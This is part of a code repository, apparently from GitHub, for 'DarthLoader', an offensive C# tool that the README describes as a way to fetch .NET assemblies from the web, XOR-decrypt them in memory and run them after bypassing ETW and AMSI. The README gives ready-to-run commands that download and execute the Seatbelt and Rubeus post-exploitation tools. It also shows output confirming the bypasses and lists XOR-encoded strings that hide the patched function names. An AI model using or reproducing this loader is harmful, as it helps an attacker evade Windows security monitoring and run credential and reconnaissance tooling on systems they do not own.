//Console.WriteLine($"[+] Hex to ASCII value var: {hexASCIIVar}"); 89 | //string decrytedPayload = XorString(hexASCIIVar, xorKey); 90 | //Console.WriteLine($"[+] Decrypted payload: {decrytedPayload}"); 91 | } 92 | catch (IndexOutOfRangeException) 93 | { 94 | Console.WriteLine("[!] 
Provide an Xor key string."); 95 | } 96 | } 97 | } 98 | } 99 | -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/DarthLoaderHelper.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {4512803D-EE69-4DE9-9D47-56F1909C6049} 8 | Exe 9 | DarthLoaderHelper 10 | DarthLoaderHelper 11 | v4.6 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("DarthLoaderHelper")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("DarthLoaderHelper")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. 
If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("4512803d-ee69-4de9-9d47-56f1909c6049")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/Debug/.NETFramework,Version=v4.6.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")] 5 | -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/Debug/DarthLoaderHelper.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache 
-------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/Release/.NETFramework,Version=v4.6.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")] 5 | -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/.NETFramework,Version=v4.6.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")] 5 | -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- 
/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | d3fcdfa2a8ddb7379f534d91fc483995f0747bd3 2 | -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\bin\x64\Release\DarthLoaderHelper.exe.config 2 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\bin\x64\Release\DarthLoaderHelper.exe 3 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\bin\x64\Release\DarthLoaderHelper.pdb 4 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\obj\x64\Release\DarthLoaderHelper.csproj.AssemblyReference.cache 5 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\obj\x64\Release\DarthLoaderHelper.csproj.CoreCompileInputs.cache 6 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\obj\x64\Release\DarthLoaderHelper.exe 7 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\obj\x64\Release\DarthLoaderHelper.pdb 8 | -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.exe -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.pdb: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.pdb -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DarthLoader 2 | This is a project heavily inspired by Jean-François Maes's [SANS Workshop Reflection in C#](https://www.sans.org/webcasts/sans-workshop-reflection-in-c-/) to help (c)sharpen my C# dev skills. Much of the code was borrowed from, or extends, the following sources: 3 | - https://github.com/cobbr/SharpSploit/tree/master/SharpSploit/Evasion 4 | - https://jfmaes-1.gitbook.io/reflection-workshop/ 5 | - StackOverflow 6 | 7 | DarthLoader does the following: 8 | - Remotely fetch a .Net assembly from the web using a base64-encoded URL and XOR the byte array in memory. 9 | - Fetch a local .Net assembly into memory. 10 | - Bypass ETW and AMSI by decrypting function strings at runtime with an XOR key passed as a command-line argument. 11 | - Decrypt and run the assembly from memory.
12 | 13 | ### Usage 14 | ``` 15 | PS C:\SecToolDev\DarthLoader\DarthLoader\bin\x64\Release> .\DarthLoader.exe 16 | 17 | _______ __ __ __ __ 18 | | \ | \ | \ | \ | \ 19 | | $$$$$$$\ ______ ______ _| $$_ | $$____ | $$ ______ ______ ____| $$ ______ ______ 20 | | $$ | $$| \ / | $$ \ | $$ \| $$ / \ | \ / $$/ \ / \ 21 | | $$ | $$ \$$$$$$| $$$$$$\$$$$$$ | $$$$$$$| $$ | $$$$$$\ \$$$$$$| $$$$$$| $$$$$$| $$$$$$\ 22 | | $$ | $$/ $| $$ \$$| $$ __| $$ | $| $$ | $$ | $$/ $| $$ | $| $$ $| $$ \$$ 23 | | $$__/ $| $$$$$$| $$ | $$| | $$ | $| $$____| $$__/ $| $$$$$$| $$__| $| $$$$$$$| $$ 24 | | $$ $$\$$ $| $$ \$$ $| $$ | $| $$ \$$ $$\$$ $$\$$ $$\$$ | $$ 25 | \$$$$$$$ \$$$$$$$\$$ \$$$$ \$$ \$$\$$$$$$$$\$$$$$$ \$$$$$$$ \$$$$$$$ \$$$$$$$\$$ 26 | 27 | 28 | ==================== USAGE: ==================== 29 | 30 | --FunctionsXorKey : Xor key to decrypt function strings from DarthLoaderHelper.exe 31 | --FilePath : a local file path or URL to load a .Net asseembly from 32 | --Args : Xor key to decrypt function strings from DarthLoaderHelper.exe 33 | --XorKey : Xor key used to encrypt/decrypt .Net assembly from URL 34 | 35 | ==================== EXAMPLES: ==================== 36 | DarthLoader.exe --FunctionsXorKey testing123 --FilePath https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_x64/Seatbelt.exe --Args AntiVirus --XorKey test 37 | 38 | DarthLoader.exe --FunctionsXorKey testing123 --FilePath https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_x64/Rubeus.exe --XorKey test 39 | 40 | DarthLoader.exe --FunctionsXorKey testing123 --FilePath C:\Users\d4ddyd4rth\Desktop\Hello.exe 41 | 42 | DarthLoader.exe --FunctionsXorKey testing123 --FilePath C:\Users\d4ddyd4rth\Desktop\Hello.exe --Args test 43 | ``` 44 | ### Example 45 | ``` 46 | PS D:\SecToolDev\DarthLoader\DarthLoader\bin\x64\Release> .\DarthLoader.exe --FunctionsXorKey testing123 --FilePath https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_x64/Seatbelt.exe --Args AntiVirus 
--XorKey test 47 | 48 | [!] ETW bypassed! 49 | [!] Amsi bypassed! 50 | _______ __ __ __ __ 51 | | \ | \ | \ | \ | \ 52 | | $$$$$$$\ ______ ______ _| $$_ | $$____ | $$ ______ ______ ____| $$ ______ ______ 53 | | $$ | $$| \ / | $$ \ | $$ \| $$ / \ | \ / $$/ \ / \ 54 | | $$ | $$ \$$$$$$| $$$$$$\$$$$$$ | $$$$$$$| $$ | $$$$$$\ \$$$$$$| $$$$$$| $$$$$$| $$$$$$\ 55 | | $$ | $$/ $| $$ \$$| $$ __| $$ | $| $$ | $$ | $$/ $| $$ | $| $$ $| $$ \$$ 56 | | $$__/ $| $$$$$$| $$ | $$| | $$ | $| $$____| $$__/ $| $$$$$$| $$__| $| $$$$$$$| $$ 57 | | $$ $$\$$ $| $$ \$$ $| $$ | $| $$ \$$ $$\$$ $$\$$ $$\$$ | $$ 58 | \$$$$$$$ \$$$$$$$\$$ \$$$$ \$$ \$$\$$$$$$$$\$$$$$$ \$$$$$$$ \$$$$$$$ \$$$$$$$\$$ 59 | 60 | 61 | [*] Downloading and encrypting assembly with the key: test 62 | [+] Encrypted assembly loaded into memory... 63 | [+] Hit any key to run... 64 | 65 | 66 | %&&@@@&& 67 | &&&&&&&%%%, #&&@@@@@@%%%%%%###############% 68 | &%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%% 69 | %%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################((((((((((((((((((( 70 | #%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################((((((((((((((((((( 71 | #%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#(((((((((( 72 | #####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####(((((((( 73 | #######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((##### 74 | ###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((##### 75 | #####%###################### %%%.. 
@////(((&%%%%%%%################ 76 | &%& %%%%% Seatbelt %////(((&%%%%%%%%#############* 77 | &%%&&&%%%%% v1.1.0 ,(((&%%%%%%%%%%%%%%%%%, 78 | #%%%%##, 79 | 80 | 81 | ====== AntiVirus ====== 82 | 83 | Engine : Windows Defender 84 | ProductEXE : windowsdefender:// 85 | ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe 86 | 87 | 88 | 89 | [*] Completed collection in 0.12 seconds 90 | 91 | <-----SNIP-----> 92 | ``` 93 | 94 | ## DarthLoaderHelper 95 | This project XOR-encrypts the strings that Helpers.cs passes into the function calls used to patch ETW/AMSI. 96 | ``` 97 | D:\SecToolDev\DarthLoaderHelper.exe testing123 98 | 99 | [+] Encrypting with key: testing123 100 | [+] Encrypted string 'etwbypass': 11110416101E064241 101 | [+] Encrypted string 'amsibypass': 1508001D0B1717504140 102 | [+] Encrypted string 'ntdll.dll': 1A1117180540035D5E 103 | [+] Encrypted string 'EtwEventWrite': 311104311F0B094565411D1116 104 | [+] Encrypted string 'amsi.dll': 1508001D470A0B5D 105 | [+] Encrypted string 'AmsiScanBuffer': 3508001D3A0D065F704612031606 106 | ``` 107 | 108 | ## To-do 109 | - [X] Help menu 110 | - [X] Parameterize URL 111 | - [X] Add local file assembly loading and parameterize file path 112 | - [X] Parameterize assembly parameters 113 | --------------------------------------------------------------------------------